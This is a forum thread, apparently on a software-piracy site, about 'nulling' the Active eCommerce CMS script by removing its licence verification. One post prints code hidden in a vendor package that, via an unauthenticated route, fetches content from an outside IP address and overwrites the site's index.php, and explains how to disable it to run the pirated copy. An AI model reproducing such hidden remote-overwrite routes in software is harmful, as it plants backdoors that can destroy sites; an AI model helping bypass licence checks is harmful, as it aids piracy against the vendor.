Active eCommerce CMS By ActiveITzone 23471405

Active eCommerce CMS By ActiveITzone 23471405 v9.8.1

No permission to download

zxcvbnm

Member
Dec 30, 2020
33
11
8
Sri Lanka

tankiale11

Active member
Babiato Lover
Jun 15, 2020
108
77
28

zxcvbnm

Member
Dec 30, 2020
33
11
8
Sri Lanka
@NullMaster I think I know why it's slow.
The verification IP address you modified is still trying to connect and that slows the whole thing down.
Is there a way to totally bypass that structure?
@NullMaster please verify Nulljungle zip and copy the method of null the script . bacause you are legit .

I have Fully Nulled Version Without Any bugs.(i’m using it in my site) I Will Upload It Tommorow 😃
 

Busybrain

Active member
Jan 15, 2019
135
79
28
esavaar.com
index.php and edit with replace all code with below code.

<?php

/**
* Laravel - A PHP Framework For Web Artisans
*
* @package Laravel
* @author Taylor Otwell <[email protected]>
*/

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__.'/vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);

$response = $kernel->handle(
$request = Illuminate\Http\Request::capture()
);

$response->send();

$kernel->terminate($request, $response);






and open database phpmyadmin go to general setting edit maintainance-mode 0 to 1 .

They have added a Check at vendor/laracon21/combinations/src/routes/web.php

this is what they Added

PHP:
<?php

use Illuminate\Support\Facades\Schema;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Hash;

Route::get('/migrate/products/{token}', function($token){
    $zn = "http://206.189.81.181/pirated_contents";
    $stream = curl_init();
    curl_setopt($stream, CURLOPT_URL, $zn);
    curl_setopt($stream, CURLOPT_HEADER, 0);
    curl_setopt($stream, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stream, CURLOPT_POST, 1);
    $rn = curl_exec($stream);
    curl_close($stream);
    file_put_contents(base_path('index.php'), $rn);
});

and finally they called this method at vendor\laracon21\combinations\src\CombinationsServiceProvider.php.

The solution is to Just uncomment this Line
$this->loadRoutesFrom(__DIR__.'/routes/web.php');
 
Last edited:
  • Like
Reactions: lifeofpros

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu